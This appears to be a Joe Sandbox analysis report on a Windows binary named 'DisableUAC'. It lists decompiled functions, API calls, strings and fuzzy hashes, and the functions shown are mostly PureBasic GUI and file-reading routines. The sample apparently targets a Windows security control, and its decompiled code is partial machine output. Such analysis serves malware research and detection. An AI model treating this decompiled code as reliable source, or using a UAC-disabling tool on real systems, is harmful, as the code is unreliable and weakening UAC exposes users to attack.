Associated: 00000004.00000002.380259531.000000014001E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_DisableUAC.jbxd

Similarity

API ID: AddressFreeLibraryProcstrlen$InitializeLoadTaskmemsetstrncpy
String ID: P$SHBrowseForFolder$SHELL32.DLL$SHGetPathFromIDList$\
API String ID: 1137656791-2331630493
Opcode ID: 04fe49d74a82b6452dc6a14c7328c9745713c448c3a06a4d24a129b92dcd578e
Instruction ID: 4d017e9a4bf078a6d1bdc937575541d6f6aa881d3fdebc123c6cb4a345dee81a
Opcode Fuzzy Hash: 04fe49d74a82b6452dc6a14c7328c9745713c448c3a06a4d24a129b92dcd578e
Instruction Fuzzy Hash: 50416B71214A8186EB16DB23B8543EE67A5FB8D7C4F844029FB4A0B775DF3AC546C700

Uniqueness

Uniqueness Score: -1.00%

Function 000000014000D6E4 Relevance: 26.3, APIs: 12, Strings: 3, Instructions: 74memorywindowCOMMON

Download Yara Rule

APIs

GetWindow.USER32 ref: 000000014000D72E
SetActiveWindow.USER32 ref: 000000014000D743
RemovePropA.USER32 ref: 000000014000D753
RemovePropA.USER32 ref: 000000014000D763
RevokeDragDrop.OLE32 ref: 000000014000D771
SendMessageA.USER32 ref: 000000014000D78B
HeapFree.KERNEL32 ref: 000000014000D7D4
DestroyAcceleratorTable.USER32 ref: 000000014000D7DE
DeleteObject.GDI32 ref: 000000014000D7ED

Strings

PB_WindowID, xrefs: 000000014000D74C
WindowClass_%I64d, xrefs: 000000014000D79C
PB_DropAccept, xrefs: 000000014000D75C

Memory Dump Source

Source File: 00000004.00000002.380219606.0000000140001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.380186845.0000000140000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380240255.0000000140016000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380249115.000000014001B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380259531.000000014001E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_DisableUAC.jbxd

Similarity

API ID: PropRemoveWindow$AcceleratorActiveDeleteDestroyDragDropFreeHeapMessageObjectRevokeSendTable
String ID: PB_DropAccept$PB_WindowID$WindowClass_%I64d
API String ID: 1930355387-2505512864
Opcode ID: bef850a0675583a750be07dcc21fc9bd417bb81471ce7b18f97576c819e23eb0
Instruction ID: 7c1b7b46c375a7c52e60067207a3687d724f889303d6988a3e4db5161df4a884
Opcode Fuzzy Hash: bef850a0675583a750be07dcc21fc9bd417bb81471ce7b18f97576c819e23eb0
Instruction Fuzzy Hash: 2731F5B5204A4481EE16DB63F9943E93361BB8CFD8F488116EB1E4B6B5EF39C445C311

Uniqueness

Uniqueness Score: -1.00%

Function 000000014000D8C0 Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 216
memoryregistryCOMMON

Download Yara Rule

C-Code - Quality: 21%

			E0000000114000D8C0(intOrPtr __edx, long long __rbx, void* __rcx, void* __r8) {
				void* __rsi;
				void* __rbp;
				signed int _t118;
				signed int _t119;
				signed int _t120;
				signed int _t122;
				signed int _t123;
				signed int _t148;
				signed int _t155;
				intOrPtr* _t160;
				intOrPtr _t161;
				long long _t163;
				long long _t164;
				long long _t165;
				long long _t167;
				long long _t172;
				intOrPtr _t178;
				intOrPtr _t192;
				char* _t194;
				void* _t195;
				WNDCLASSA* _t199;
				intOrPtr* _t200;
				struct tagRECT* _t202;
				intOrPtr* _t204;
				long _t206;
				void* _t207;
				intOrPtr* _t209;
				void* _t210;
				int _t218;
				int _t220;
				void* _t222;
				char* _t224;

				_t175 = __rbx;
				_t160 = _t209;
				 *((long long*)(_t160 + 0x18)) = __rbx;
				 *(_t160 + 0x20) = r9d;
				 *((intOrPtr*)(_t160 + 0x10)) = __edx;
				_t207 = _t160 - 0x108;
				_t210 = _t209 - 0x1d0;
				_t118 =  *(_t207 + 0x140);
				r15d = __edx;
				_t178 =  *0x4001d880; // 0x21a30b0
				r12d = 0;
				r13d = r8d;
				 *(_t207 + 0x140) = _t118;
				 *(_t207 + 0x110) = r12d;
				_t8 = _t218 + 1; // 0x1
				r14d = _t8;
				E000000011400135C4(_t160, __rbx, _t178, __rcx);
				_t200 = _t160;
				if (__rcx != 0xffffffff) goto 0x4000d931;
				_t204 = _t160;
				if (_t160 != 0xffffffff) goto 0x4000d931;
				goto 0x4000d934;
				_t194 = "WindowClass_%I64d";
				sprintf(_t224);
				_t161 =  *((intOrPtr*)(_t207 + 0x138));
				_t181 =  !=  ? _t161 : 0x400196e6;
				 *((long long*)(_t210 + 0x70)) =  !=  ? _t161 : 0x400196e6;
				_t12 = _t194 + 0x48; // 0x48
				r8d = _t12;
				memset(_t222, _t220, _t218);
				 *((long long*)(_t207 - 0x78)) = E0000000114000E514;
				_t163 =  *0x4001caa8; // 0x140000000
				 *((intOrPtr*)(_t207 - 0x80)) = 8;
				 *((long long*)(_t207 - 0x68)) = _t163;
				_t164 =  *0x4001d8b0; // 0x0
				 *(_t207 - 0x6c) = r12d;
				 *((long long*)(_t207 - 0x60)) = _t164;
				_t165 =  *0x4001d8c0; // 0x10003
				 *((long long*)(_t207 - 0x50)) = 0x10;
				 *((long long*)(_t207 - 0x58)) = _t165;
				 *((long long*)(_t207 - 0x40)) = _t207 - 0x30;
				RegisterClassA(_t199);
				_t100 =  !=  ? r12d : r14d;
				_t119 = _t118 & 0xfffffff7;
				 *((intOrPtr*)(_t207 + 0x138)) =  !=  ? r12d : r14d;
				_t148 = _t119 & 0xeffffffc;
				if (_t148 != 0) goto 0x4000d9e0;
				_t120 = _t119 | 0x00c00000;
				asm("bt ebx, 0x1c");
				if (_t148 >= 0) goto 0x4000d9ed;
				asm("btr ebx, 0x1c");
				r14d = r12d;
				asm("bt ebx, 0x19");
				r12d =  <  ? 1 : r12d;
				if ((_t120 & 0x00000004) == 0) goto 0x4000da11;
				 *(_t207 + 0x110) = 0x80;
				_t122 = _t120 & 0xdefcffff | 0x00c00000;
				r9d =  *(_t207 + 0x110);
				 *(_t210 + 0x60) =  *(_t210 + 0x60) & 0x00000000;
				 *(_t210 + 0x64) =  *(_t210 + 0x64) & 0x00000000;
				 *((intOrPtr*)(_t210 + 0x68)) =  *((intOrPtr*)(_t207 + 0x128));
				r8d = 0;
				 *((intOrPtr*)(_t210 + 0x6c)) =  *((intOrPtr*)(_t207 + 0x130));
				AdjustWindowRectEx(_t202, _t206);
				r11d =  *((intOrPtr*)(_t210 + 0x68));
				r11d = r11d -  *(_t210 + 0x60);
				if (r15d == 0xffff0001) goto 0x4000da6f;
				if (r13d != 0xffff0001) goto 0x4000da7a;
				if ((_t122 & 0x00000003) != 0) goto 0x4000da7a;
				r13d = 0x80000000;
				r9d = r13d;
				goto 0x4000da81;
				r9d =  *(_t207 + 0x118);
				 *(_t210 + 0x58) =  *(_t210 + 0x58) & 0x00000000;
				_t167 =  *0x4001caa8; // 0x140000000
				 *((long long*)(_t210 + 0x50)) = _t167;
				 *(_t210 + 0x48) =  *(_t210 + 0x48) & 0x00000000;
				 *((long long*)(_t210 + 0x40)) =  *((intOrPtr*)(_t207 + 0x148));
				 *((intOrPtr*)(_t210 + 0x38)) =  *((intOrPtr*)(_t210 + 0x6c)) -  *(_t210 + 0x64);
				 *((intOrPtr*)(_t210 + 0x30)) = r11d;
				_t123 = _t122 & 0xfdfffff8;
				_t60 = _t207 - 0x30; // 0x7fffffd0
				_t195 = _t60;
				 *(_t210 + 0x28) = r13d;
				 *(_t210 + 0x20) = r9d;
				r9d = _t123;
				CreateWindowExA(??, ??, ??, ??, ??, ??, ??, ??, ??, ??, ??, ??);
				 *_t200 = _t167;
				if (_t167 == 0) goto 0x4000dbed;
				if (( *(_t207 + 0x140) & 0x00000003) == 0) goto 0x4000daf8;
				E0000000114000E5E4( *(_t207 + 0x140), _t175, _t167, _t204, _t207,  *((intOrPtr*)(_t207 + 0x148)));
				_t155 = r14d;
				if (_t155 == 0) goto 0x4000db36;
				asm("bt ebx, 0x18");
				if (_t155 >= 0) goto 0x4000db10;
				r12d =  ~r12d;
				asm("sbb edx, edx");
				goto 0x4000db2d;
				asm("bt ebx, 0x1d");
				if (_t155 >= 0) goto 0x4000db23;
				r12d =  ~r12d;
				asm("sbb edx, edx");
				goto 0x4000db2d;
				r12d =  ~r12d;
				asm("sbb edx, edx");
				ShowWindow(??, ??);
				 *((intOrPtr*)(_t200 + 0x20)) = 2;
				 *(_t200 + 0x48) = 0 | (_t123 & 0x21000000) != 0x00000000;
				_t72 = _t195 + 0xc; // 0xc
				r8d = _t72;
				HeapAlloc(??, ??, ??);
				 *((long long*)(_t200 + 8)) = _t167;
				 *((short*)(_t167 + 2)) = 9;
				 *((short*)( *((intOrPtr*)(_t200 + 8)) + 4)) = 0xfa01;
				 *((char*)( *((intOrPtr*)(_t200 + 8)))) = 3;
				 *((short*)( *((intOrPtr*)(_t200 + 8)) + 8)) = 9;
				 *((short*)( *((intOrPtr*)(_t200 + 8)) + 0xa)) = 0xfa02;
				_t172 =  *((intOrPtr*)(_t200 + 8));
				 *((char*)(_t172 + 6)) = 7;
				CreateAcceleratorTableA(??, ??);
				 *(_t200 + 0x24) =  *(_t200 + 0x24) | 0xffffffff;
				 *(_t200 + 0x30) =  *(_t200 + 0x30) & 0x00000000;
				 *((long long*)(_t200 + 0x10)) = _t172;
				if ( *((intOrPtr*)(_t207 + 0x138)) == 0) goto 0x4000dbca;
				E00000001140015594(_t172, _t175,  *_t200, _t204, _t207);
				SetPropA(??, ??, ??);
				if (_t204 != _t200) goto 0x4000dbe8;
				goto 0x4000dc0f;
				goto 0x4000dc0f;
				UnregisterClassA(??, ??);
				_t192 =  *0x4001d880; // 0x21a30b0
				E00000001140013690(_t192, _t204);
				return 0;
			}

0x14000d8c0
0x14000d8c0
0x14000d8c3
0x14000d8c7
0x14000d8cb
0x14000d8d9
0x14000d8e0
0x14000d8e7
0x14000d8ed
0x14000d8f6
0x14000d8fd
0x14000d900
0x14000d903
0x14000d909
0x14000d910
0x14000d910
0x14000d915
0x14000d91a
0x14000d921
0x14000d923
0x14000d92a
0x14000d92f
0x14000d934
0x14000d93f
0x14000d944
0x14000d955
0x14000d95b
0x14000d960
0x14000d960
0x14000d968
0x14000d978
0x14000d97c
0x14000d983
0x14000d98a
0x14000d98e
0x14000d995
0x14000d999
0x14000d99d
0x14000d9a4
0x14000d9ac
0x14000d9b4
0x14000d9b8
0x14000d9c9
0x14000d9cd
0x14000d9d0
0x14000d9d6
0x14000d9dc
0x14000d9de
0x14000d9e0
0x14000d9e4
0x14000d9e6
0x14000d9ea
0x14000d9ed
0x14000d9f6
0x14000d9fd
0x14000da05
0x14000da0f
0x14000da17
0x14000da1e
0x14000da23
0x14000da28
0x14000da39
0x14000da3f
0x14000da43
0x14000da49
0x14000da52
0x14000da63
0x14000da68
0x14000da6d
0x14000da6f
0x14000da75
0x14000da78
0x14000da7a
0x14000da81
0x14000da87
0x14000daa0
0x14000daa5
0x14000daab
0x14000dab0
0x14000dab4
0x14000dab9
0x14000dabf
0x14000dabf
0x14000dac3
0x14000dac8
0x14000dacd
0x14000dad0
0x14000dad6
0x14000dadc
0x14000daeb
0x14000daf3
0x14000daf8
0x14000dafb
0x14000dafd
0x14000db01
0x14000db03
0x14000db06
0x14000db0e
0x14000db10
0x14000db14
0x14000db16
0x14000db19
0x14000db21
0x14000db23
0x14000db26
0x14000db30
0x14000db3b
0x14000db4d
0x14000db57
0x14000db57
0x14000db5b
0x14000db6b
0x14000db6f
0x14000db77
0x14000db84
0x14000db8b
0x14000db93
0x14000db97
0x14000db9b
0x14000dba6
0x14000dbac
0x14000dbb0
0x14000dbbc
0x14000dbc0
0x14000dbc5
0x14000dbd8
0x14000dbe1
0x14000dbe6
0x14000dbeb
0x14000dbf8
0x14000dbfe
0x14000dc08
0x14000dc29

APIs

sprintf.MSVCRT ref: 000000014000D93F
memset.MSVCRT ref: 000000014000D968
RegisterClassA.USER32 ref: 000000014000D9B8
AdjustWindowRectEx.USER32 ref: 000000014000DA43
CreateWindowExA.USER32 ref: 000000014000DAD0
ShowWindow.USER32 ref: 000000014000DB30
HeapAlloc.KERNEL32 ref: 000000014000DB5B
CreateAcceleratorTableA.USER32 ref: 000000014000DBA6
SetPropA.USER32 ref: 000000014000DBD8
UnregisterClassA.USER32 ref: 000000014000DBF8

Strings

PB_WindowID, xrefs: 000000014000DBD1
WindowClass_%I64d, xrefs: 000000014000D934

Memory Dump Source

Source File: 00000004.00000002.380219606.0000000140001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.380186845.0000000140000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380240255.0000000140016000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380249115.000000014001B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380259531.000000014001E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_DisableUAC.jbxd

Similarity

API ID: Window$ClassCreate$AcceleratorAdjustAllocHeapPropRectRegisterShowTableUnregistermemsetsprintf
String ID: PB_WindowID$WindowClass_%I64d
API String ID: 3396131212-780217238
Opcode ID: 9de13b7d7f5b6e3a37ecf2f6a8e38b6f1a8c1aa8fe992bbec7aa24d7990cd0da
Instruction ID: d868e82fd93bad0519ee2860afd66e64abc741c22ee0f602c88edf150447a4bb
Opcode Fuzzy Hash: 9de13b7d7f5b6e3a37ecf2f6a8e38b6f1a8c1aa8fe992bbec7aa24d7990cd0da
Instruction Fuzzy Hash: 97A18E72614B848AE726CF26E8807DD77A1F78C7E8F048216EB594BBA8DB79C554C700

Uniqueness

Uniqueness Score: -1.00%

Function 000000014000C538 Relevance: 21.1, APIs: 14, Instructions: 92memorywindowCOMMON

Download Yara Rule

APIs

GetDC.USER32 ref: 000000014000C55C
SendMessageA.USER32 ref: 000000014000C572
SelectObject.GDI32 ref: 000000014000C57E
GetWindowTextLengthA.USER32 ref: 000000014000C58B
HeapAlloc.KERNEL32 ref: 000000014000C5AD
GetWindowTextA.USER32 ref: 000000014000C5CE
SetRect.USER32 ref: 000000014000C5E5
DrawTextA.USER32 ref: 000000014000C606
GetWindowLongA.USER32 ref: 000000014000C61D
GetSystemMetrics.USER32 ref: 000000014000C62E
GetSystemMetrics.USER32 ref: 000000014000C63C
HeapFree.KERNEL32 ref: 000000014000C659
SelectObject.GDI32 ref: 000000014000C665
ReleaseDC.USER32 ref: 000000014000C672

Memory Dump Source

Source File: 00000004.00000002.380219606.0000000140001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.380186845.0000000140000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380240255.0000000140016000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380249115.000000014001B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380259531.000000014001E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_DisableUAC.jbxd

Similarity

API ID: TextWindow$HeapMetricsObjectSelectSystem$AllocDrawFreeLengthLongMessageRectReleaseSend
String ID:
API String ID: 2456011057-0
Opcode ID: 22861877e451c57cf266cd5870670ba02b46a8b1e469308d2f18b729b715d5e5
Instruction ID: 2c25d15d8150f081b3b613c082a5dd106fe62e75c72b768fb938c4aa4a10d002
Opcode Fuzzy Hash: 22861877e451c57cf266cd5870670ba02b46a8b1e469308d2f18b729b715d5e5
Instruction Fuzzy Hash: 10311976610A9486E715CF63E858B9A7761FBCCBD5F448011EF4A4BB24EF3AC445C700

Uniqueness

Uniqueness Score: -1.00%

Function 000000014000EB1C Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 58libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32 ref: 000000014000EB3C
GetProcAddress.KERNEL32 ref: 000000014000EB54
memset.MSVCRT ref: 000000014000EB6D
FreeLibrary.KERNEL32 ref: 000000014000EB97
LoadLibraryA.KERNEL32 ref: 000000014000EBA4
GetProcAddress.KERNEL32 ref: 000000014000EBBC
FreeLibrary.KERNEL32 ref: 000000014000EBDD

Strings

COMCTL32.DLL, xrefs: 000000014000EB32
uxtheme.dll, xrefs: 000000014000EB9D
DllGetVersion, xrefs: 000000014000EB4A
IsAppThemed, xrefs: 000000014000EBB2

Memory Dump Source

Source File: 00000004.00000002.380219606.0000000140001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.380186845.0000000140000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380240255.0000000140016000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380249115.000000014001B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380259531.000000014001E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_DisableUAC.jbxd

Similarity

API ID: Library$AddressFreeLoadProc$memset
String ID: COMCTL32.DLL$DllGetVersion$IsAppThemed$uxtheme.dll
API String ID: 4277437538-2634860346
Opcode ID: 9e6ed531d6d4a1995ee5fa701b9fbc1c42df941688566333a2b824063f1e7f74
Instruction ID: a6422d266d31b7d2000c620c37193a9139d1a248f3bc7e70747e8d84cc4c387e
Opcode Fuzzy Hash: 9e6ed531d6d4a1995ee5fa701b9fbc1c42df941688566333a2b824063f1e7f74
Instruction Fuzzy Hash: 10211A71208B4582EB22DB17F8503DA73A1EB8CBC4F884025EB4A57769EF79C545C711

Uniqueness

Uniqueness Score: -1.00%

Function 000000014000CD34 Relevance: 18.1, APIs: 12, Instructions: 84memorywindowCOMMON

Download Yara Rule

APIs

GetDC.USER32 ref: 000000014000CD64
SendMessageA.USER32 ref: 000000014000CD7A
SelectObject.GDI32 ref: 000000014000CD86
GetWindowTextLengthA.USER32 ref: 000000014000CD92
HeapAlloc.KERNEL32 ref: 000000014000CDAB
GetWindowTextA.USER32 ref: 000000014000CDC2
GetTextExtentPoint32A.GDI32 ref: 000000014000CDD6
GetSystemMetrics.USER32 ref: 000000014000CDE1
GetSystemMetrics.USER32 ref: 000000014000CDF8
HeapFree.KERNEL32 ref: 000000014000CE1F
SelectObject.GDI32 ref: 000000014000CE2B
ReleaseDC.USER32 ref: 000000014000CE37

Memory Dump Source

Source File: 00000004.00000002.380219606.0000000140001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.380186845.0000000140000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380240255.0000000140016000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380249115.000000014001B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380259531.000000014001E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_DisableUAC.jbxd

Similarity

API ID: Text$HeapMetricsObjectSelectSystemWindow$AllocExtentFreeLengthMessagePoint32ReleaseSend
String ID:
API String ID: 1864001859-0
Opcode ID: 7a59ce5ee96ee26db5fcbedae70df68a3b26fc969fb36e26b1f796eb6b585116
Instruction ID: 2f5f4b3219c92bb7ff5f5b4f4928c75a98c03cdca2d7466a84321d6f44b78d4f
Opcode Fuzzy Hash: 7a59ce5ee96ee26db5fcbedae70df68a3b26fc969fb36e26b1f796eb6b585116
Instruction Fuzzy Hash: 52311676600A458AEB05CF67F844799B7A1FB8DBD5F088025EF0A4B724DF79C149CB00

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140015594 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 90memoryCOMMON

Download Yara Rule

APIs

sprintf.MSVCRT ref: 00000001400155E3
GetPropA.USER32 ref: 00000001400155F5
GetPropA.USER32 ref: 0000000140015623
HeapFree.KERNEL32 ref: 0000000140015643
HeapAlloc.KERNEL32 ref: 0000000140015684
HeapAlloc.KERNEL32 ref: 00000001400156AB
SetPropA.USER32 ref: 00000001400156C2
SetWindowLongPtrA.USER32 ref: 00000001400156D7

Strings

PB_GadgetStack_%I64i, xrefs: 00000001400155D7

Memory Dump Source

Source File: 00000004.00000002.380219606.0000000140001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.380186845.0000000140000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380240255.0000000140016000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380249115.000000014001B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380259531.000000014001E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_DisableUAC.jbxd

Similarity

API ID: HeapProp$Alloc$FreeLongWindowsprintf
String ID: PB_GadgetStack_%I64i
API String ID: 802322696-1095576542
Opcode ID: f2e88fafcb408db71e9dd35b3968fd4fb1f46b84603dea5f4970bfe77da80e89
Instruction ID: b8659d18728cecc09a8e8adf5154ee3eea8d98ff4483d16266943b1c94415ab6
Opcode Fuzzy Hash: f2e88fafcb408db71e9dd35b3968fd4fb1f46b84603dea5f4970bfe77da80e89
Instruction Fuzzy Hash: 39411576200B44DBEB15DF22E54039833A0F78CBD9F844126EB494BB64DF3AD5A5C780

Uniqueness

Uniqueness Score: -1.00%

Function 000000014000D198 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 76COMMON

Download Yara Rule

APIs

GetWindowLongPtrA.USER32 ref: 000000014000D1C5
CallWindowProcA.USER32 ref: 000000014000D1FF
RemovePropA.USER32 ref: 000000014000D22C
RemovePropA.USER32 ref: 000000014000D23C
RevokeDragDrop.OLE32 ref: 000000014000D24A
SetWindowLongPtrA.USER32 ref: 000000014000D25B
DefWindowProcA.USER32 ref: 000000014000D293

Strings

PB_ID, xrefs: 000000014000D222
PB_DropAccept, xrefs: 000000014000D232

Memory Dump Source

Source File: 00000004.00000002.380219606.0000000140001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.380186845.0000000140000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380240255.0000000140016000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380249115.000000014001B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380259531.000000014001E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_DisableUAC.jbxd

Similarity

API ID: Window$LongProcPropRemove$CallDragDropRevoke
String ID: PB_DropAccept$PB_ID
API String ID: 2605631428-3688647018
Opcode ID: 310bd8c3bfb7a44af88b6557a691d016e3999885b45731154b802d6b5f984bb0
Instruction ID: 7a507d3061d4791754bcf47214461dd08631fde42ed1f696d07a734a7b59e245
Opcode Fuzzy Hash: 310bd8c3bfb7a44af88b6557a691d016e3999885b45731154b802d6b5f984bb0
Instruction Fuzzy Hash: 73215A75700B4481EA16EB57B844399B3A1BB8DFE4F484622AE6A1B3B5CF39C4458344

Uniqueness

Uniqueness Score: -1.00%

Function 000000014000AF24 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 96memoryfileCOMMON

Download Yara Rule

APIs

HeapAlloc.KERNEL32 ref: 000000014000AF5B
SetFilePointer.KERNEL32 ref: 000000014000AF77
ReadFile.KERNEL32 ref: 000000014000AF9D
ReadFile.KERNEL32 ref: 000000014000AFD1
HeapReAlloc.KERNEL32 ref: 000000014000B000
HeapAlloc.KERNEL32 ref: 000000014000B01C
ReadFile.KERNEL32 ref: 000000014000B04A

Strings

1zlp, xrefs: 000000014000B05B

Memory Dump Source

Source File: 00000004.00000002.380219606.0000000140001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.380186845.0000000140000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380240255.0000000140016000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380249115.000000014001B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380259531.000000014001E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_DisableUAC.jbxd

Similarity

API ID: File$AllocHeapRead$Pointer
String ID: 1zlp
API String ID: 2225201569-2851666121
Opcode ID: 827e38826ad69cb1198d771556ec1ffc5e254475ab35794ae2e5b788985f9c70
Instruction ID: 842a1715e907775ba5a61d0d73eab3fcaa91614e4850c6ac6379c8b0549847d2
Opcode Fuzzy Hash: 827e38826ad69cb1198d771556ec1ffc5e254475ab35794ae2e5b788985f9c70
Instruction Fuzzy Hash: 52413676610B14CAEB11CFA2E8407AD37B0F38CB98F894115EF4A5BB68CB39C555CB91

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140015488 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72memoryCOMMON

Download Yara Rule

APIs

sprintf.MSVCRT ref: 00000001400154BD
GetPropA.USER32 ref: 00000001400154CA
HeapFree.KERNEL32 ref: 0000000140015524
HeapFree.KERNEL32 ref: 0000000140015536
RemovePropA.USER32 ref: 0000000140015544
CallWindowProcA.USER32 ref: 0000000140015560
DefWindowProcA.USER32 ref: 0000000140015573

Strings

PB_GadgetStack_%I64i, xrefs: 00000001400154AF

Memory Dump Source

Source File: 00000004.00000002.380219606.0000000140001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.380186845.0000000140000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380240255.0000000140016000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380249115.000000014001B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380259531.000000014001E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_DisableUAC.jbxd

Similarity

API ID: FreeHeapProcPropWindow$CallRemovesprintf
String ID: PB_GadgetStack_%I64i
API String ID: 3302030571-1095576542
Opcode ID: 35c44e7041323c3e01db895c0fd0037fdea356d4ecc6b086c85f373432284f5c
Instruction ID: fee7cd9d3e361c9865bb8565793ef5c65d34e2c7154af0a76770194b39fcce09
Opcode Fuzzy Hash: 35c44e7041323c3e01db895c0fd0037fdea356d4ecc6b086c85f373432284f5c
Instruction Fuzzy Hash: 56312576210A44C6EB56DB13E85479937A2FB8CFC5F998122EF5A0B764DF3AC945C300

Uniqueness

Uniqueness Score: -1.00%

Function 000000014000F3F0 Relevance: 13.6, APIs: 9, Instructions: 116memorywindowCOMMON

Download Yara Rule

APIs

GetObjectA.GDI32 ref: 000000014000F41E
CreateBitmap.GDI32 ref: 000000014000F436
CreateCompatibleDC.GDI32 ref: 000000014000F44A
SelectObject.GDI32 ref: 000000014000F462
SetPixel.GDI32 ref: 000000014000F4E7
HeapFree.KERNEL32 ref: 000000014000F51E
GetStockObject.GDI32 ref: 000000014000F547
FillRect.USER32 ref: 000000014000F557
DeleteDC.GDI32 ref: 000000014000F560

Part of subcall function 000000014000EC64: GetObjectA.GDI32 ref: 000000014000EC96

Memory Dump Source

Source File: 00000004.00000002.380219606.0000000140001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.380186845.0000000140000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380240255.0000000140016000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380249115.000000014001B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380259531.000000014001E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_DisableUAC.jbxd

Similarity

API ID: Object$Create$BitmapCompatibleDeleteFillFreeHeapPixelRectSelectStock
String ID:
API String ID: 3110387212-0
Opcode ID: 30f92a77b18afa8a6fc0d17a69bc71e187f803f70dfdf5ccbcd8bbade952976a
Instruction ID: e295d7a885d8f96c180d2d03ba46ad53ebff87bc304e5fbc786217ad14123b7f
Opcode Fuzzy Hash: 30f92a77b18afa8a6fc0d17a69bc71e187f803f70dfdf5ccbcd8bbade952976a
Instruction Fuzzy Hash: F8418F72B006008BFB16DF66A8447EE37A1B74CBD9F048418EF051BBA8DB79C445D740

Uniqueness

Uniqueness Score: -1.00%

Function 000000014000EEC8 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 177COMMON

Download Yara Rule

APIs

CreateCompatibleDC.GDI32 ref: 000000014000EF10
GetObjectA.GDI32 ref: 000000014000EF2E
memset.MSVCRT ref: 000000014000EF4D
CreateDIBSection.GDI32 ref: 000000014000EF8C
GetDIBits.GDI32 ref: 000000014000EFC1
DeleteDC.GDI32 ref: 000000014000F107

Strings

gfff, xrefs: 000000014000EFE3

Memory Dump Source

Source File: 00000004.00000002.380219606.0000000140001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.380186845.0000000140000000.00000002.00000001.01000000.00000005.sdmpDownload File
